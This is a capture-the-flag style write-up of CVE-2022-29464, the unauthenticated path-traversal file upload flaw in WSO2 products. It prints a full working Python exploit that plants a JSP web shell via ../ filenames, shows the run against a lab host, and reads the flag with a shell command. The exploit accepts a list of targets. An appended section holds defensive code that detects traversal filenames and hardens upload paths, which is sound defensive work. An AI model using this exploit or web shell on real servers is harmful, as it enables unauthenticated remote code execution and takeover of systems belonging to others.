CVE-2022-29464
I. Vulnerability overview
The WSO2 file upload vulnerability (CVE-2022-29464) is a critical vulnerability in WSO2 products discovered by Orange Tsai. It is an unauthenticated, unrestricted arbitrary file upload: the file-upload servlet accepts a multipart request without any credentials and writes the uploaded part to disk without sanitising its filename, so a filename containing ../ segments places the file wherever the attacker chooses. Uploading a malicious JSP into an already deployed webapp directory therefore gives an unauthenticated attacker remote code execution on the WSO2 server.
II. Exploitation steps
1. Open the target site
https://eci-2ze93woxli32brxbox87.cloudeci1.ichunqiu.com:9443
2. PoC script
URL:https://github.com/wave-to/Poc/blob/main/FileUpload/CVE-2022-29464.py
import argparse
import requests
import urllib3

# verify=False is used below, so silence the per-request TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(url):
    # NOTE: the scheme is hard-coded to http:// although the target in step 1 is served
    # over https:// on 9443; change it here if the target only listens on TLS.
    # /fileupload/toolsAny is the unauthenticated upload endpoint.
    uurl = "http://" + url + "/fileupload/toolsAny"
    # Minimal JSP web shell: runs ?cmd=... through Runtime.exec and echoes stdout.
    shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
    String s = null;
    try {
        Process p = Runtime.getRuntime().exec(cmd,null,null);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) { output += s+"</br>"; }
    } catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
    # The dict key becomes the multipart part's filename and is used verbatim by the
    # server. The leading ../ segments climb out of the upload scratch directory to the
    # Carbon home, so the JSP lands inside the already deployed authenticationendpoint
    # webapp and is served at /authenticationendpoint/wavesky.jsp.
    files = {"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell}
    response = requests.post(url=uurl, files=files, verify=False)
    if response.status_code == 200:
        print('It looks likely vulnerable')
        print('Please use this url:' + '{\33[91m' + 'http://' + url
              + '/authenticationendpoint/wavesky.jsp' + '\33[0m}' + ' to view and attack~')
    else:
        print('It is strong')


if __name__ == '__main__':
    parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:')
    parameter.add_argument('--file', help='url file', required=False)
    parameter.add_argument('--url', help='ip:port', required=False)
    para = parameter.parse_args()
    if para.url:
        exploit(para.url)
    elif para.file:
        # One ip:port target per line.
        with open(para.file) as fh:
            for line in fh:
                target = line.strip()
                if target:
                    exploit(target)
    else:
        parameter.print_help()
3. Run the PoC
┌──(kali㉿kali)-[~]
└─$ python3 CVE-2022-29464.py --url eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445
It looks likely vulnerable
Please use this url:{http://eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445/authenticationendpoint/wavesky.jsp} to view and attack~
4. Find the flag
Call the uploaded web shell with cmd=cat /flag (URL-encoded as cat+%2Fflag):
http://eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445/authenticationendpoint/wavesky.jsp?cmd=cat+%2Fflag
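To make clear what the PoC above actually puts on the wire, and what a defender or a patch has to check, here is an added example (written for this page, not code from the PoC repository or from WSO2). It builds the multipart body offline with the same traversal filename the PoC uses, flags filenames that would leave the upload directory, shows where a server that joins the untrusted filename directly would write the file, and contrasts that with a hardened basename-plus-containment check. The upload scratch directory (ASSUMED_UPLOAD_DIR) is an assumption chosen so that the four ../ segments of the PoC filename climb back to the Carbon home; the page does not state the real directory.

```python
import posixpath
import re

# Taken from the PoC on this page.
UPLOAD_ENDPOINT = "/fileupload/toolsAny"
POC_FILENAME = ("../../../../repository/deployment/server/webapps/"
                "authenticationendpoint/wavesky.jsp")
# ASSUMED for illustration: a scratch directory four levels below the Carbon
# home (/opt/wso2), so that the PoC's four "../" segments resolve back to it.
ASSUMED_UPLOAD_DIR = "/opt/wso2/tmp/work/uploads/abcd"


def build_multipart(filename: str, content: bytes, boundary: str = "poc") -> tuple[bytes, str]:
    """Build a multipart/form-data body with one file part, as the PoC sends it.

    The filename goes into Content-Disposition verbatim; nothing strips "../".
    Returns (body, value for the Content-Type header).
    """
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


_FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*?filename="([^"\r\n]*)"', re.I)


def traversal_filenames(body: bytes) -> list[str]:
    """Return every part filename in a multipart body that is not a bare basename.

    Slashes, backslashes and ".." segments are all flagged; this is the check a
    WAF rule or a request-log scanner would apply to POSTs against /fileupload/.
    """
    found = []
    for m in _FILENAME_RE.finditer(body):
        name = m.group(1).decode("utf-8", "replace")
        if name != posixpath.basename(name) or "\\" in name or ".." in name.split("/"):
            found.append(name)
    return found


def resolved_upload_path(upload_dir: str, filename: str) -> str:
    """Where a server that joins the untrusted filename directly would write."""
    return posixpath.normpath(posixpath.join(upload_dir, filename))


def escapes_upload_dir(upload_dir: str, filename: str) -> bool:
    """True when the resolved path lands outside upload_dir: the CVE-2022-29464 condition."""
    base = posixpath.normpath(upload_dir)
    target = resolved_upload_path(upload_dir, filename)
    return not (target == base or target.startswith(base + "/"))


def safe_target_path(upload_dir: str, filename: str) -> str:
    """Hardened variant: keep only the basename, then re-check containment."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if not name or name in (".", ".."):
        raise ValueError("empty or dot filename rejected")
    if escapes_upload_dir(upload_dir, name):
        raise ValueError("filename escapes upload directory")
    return resolved_upload_path(upload_dir, name)


if __name__ == "__main__":
    body, ctype = build_multipart(POC_FILENAME, b"<% out.println(1); %>")
    print("POST", UPLOAD_ENDPOINT, "with Content-Type:", ctype)
    print(body.decode())
    print("suspicious filenames:", traversal_filenames(body))
    print("unsanitised server would write:", resolved_upload_path(ASSUMED_UPLOAD_DIR, POC_FILENAME))
    print("hardened server writes:", safe_target_path(ASSUMED_UPLOAD_DIR, POC_FILENAME))
```

The same traversal_filenames check can be pointed at captured request bodies to hunt for exploitation attempts: any multipart part whose filename is not a plain basename, arriving at /fileupload/, is worth an alert regardless of whether the upload succeeded.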